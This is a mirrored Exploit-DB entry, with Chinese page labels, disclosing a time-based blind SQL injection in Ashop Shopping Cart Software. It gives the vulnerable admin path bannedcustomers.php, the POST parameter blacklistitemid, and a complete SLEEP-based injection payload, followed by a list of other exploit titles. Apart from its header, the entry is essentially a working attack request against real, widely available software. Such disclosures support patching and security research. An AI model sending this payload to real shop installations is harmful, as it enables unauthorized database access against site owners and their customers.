Ashop Shopping Cart Software – ‘bannedcustomers.php?blacklistitemid’ SQL Injection

Exploit Database
17 阅读

作者： Doğukan Karaciğer

日期： 2019-04-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46681/

# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 08.04.2019
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Ubuntu-trusty-64
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT
* FROM (SELECT(SLEEP(5)))MGvE)

last Exploits
Ashop Shopping Cart Software – ‘bannedcustomers.php?blacklistitemid’ SQL Injection的更多信息

Simple Posting System – Multiple Vulnerabilities：
Uniview NVR – Password Disclosure：
EasyPublish CMS 23.04.2010 – URI Cross-Site Scripting：
Joomla! Component JEXTN Video Gallery 3.0.5 – ‘id’ SQL Injection：
Media Library Assistant WordPress Plugin – RCE and LFI：
RockMongo PHP MongoDB Administrator 1.1.8 – Multiple Vulnerabilities：
Business Directory Script – SQL Injection：
Dokeos 2.2.1 – Blind SQL Injection：